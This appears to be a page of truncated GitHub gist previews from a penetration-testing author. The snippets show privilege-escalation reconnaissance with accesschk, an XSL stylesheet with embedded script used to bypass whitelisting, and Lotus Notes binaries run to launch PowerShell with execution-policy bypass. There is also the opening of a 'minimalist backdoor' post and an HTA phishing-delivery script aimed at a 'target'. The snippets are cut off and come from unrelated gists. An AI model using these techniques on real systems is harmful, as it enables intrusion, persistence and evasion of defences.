api0cradle

accesschk -w -s -u Users "C:\Program Files" >> programfiles.txt
accesschk -w -s -u Everyone "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Authenticated Users" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u Interactive "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "This Organization" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Authentication authority asserted identity" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u "Mandatory Label\Medium Mandatory Level" "C:\Program Files" >> programfiles.txt
accesschk -w -s -u %username% "C:\Program Files" >> programfiles.txt

accesschk -w -s -u Users "C:\Program Files (x86)" >> programfilesx86.txt

api0cradle

function Get-PublicKey
{
    [OutputType([byte[]])]
    PARAM (
        [Uri]$Uri
    )

    if (-Not ($uri.Scheme -eq "https"))
    {
        Write-Error "You can only get keys for https addresses"

api0cradle

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
<!-- Copyright (c) Microsoft Corporation.  All rights reserved. -->

<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
<xsl:strip-space elements="*" />

<ms:script implements-prefix="user" language="JScript">
<![CDATA[

	

api0cradle

"C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe" "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } 


NLNOTES.EXE  /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass } 


Hashes of each binary (prepare for onslaught of md5 naysayers):
Notes.exe — 8f633ef1e1147637c25dd917909cd361
NLNOTES.EXE — 3586b9069a1d4e1c63d9c9cf95cf4126

api0cradle

using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
 
/*

api0cradle

// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)
hostname
echo %username%

// Get users
net users
net user [username]

api0cradle

c:\Windows\ccm\inventory\noidmifs
c:\Windows\ccm\logs
c:\Windows\ccm\systemtemp\appvtempdata\appvcommandoutput

api0cradle

#
# Demonstrate how to queue tasks to execute with each checkin...
#

#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
# 
sub stuffToDo {
	# Tasks for first checkin

api0cradle

From the inside out, a minimalist backdoor. 

I'm a pretty big fan of simple, and elegant.  In this gist blog, I'll show you a very simple way to maintain access to a remote system that is behind a FireWall, NAT and VPN.

We will use in this example 3 tools.
1. Node
2. PowerShell
3. LocalTunnel

While I have a full compact, custom version, I will not release this.  

api0cradle

<#
  Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
  To change your server, simply find and replace 192.168.1.1 with your server in the code.
  
#>

<#
	Moving Credtis for CACTUSTORCH HERE
	I was in escape sequcence hell ;-) 
	'                                (              )  (            )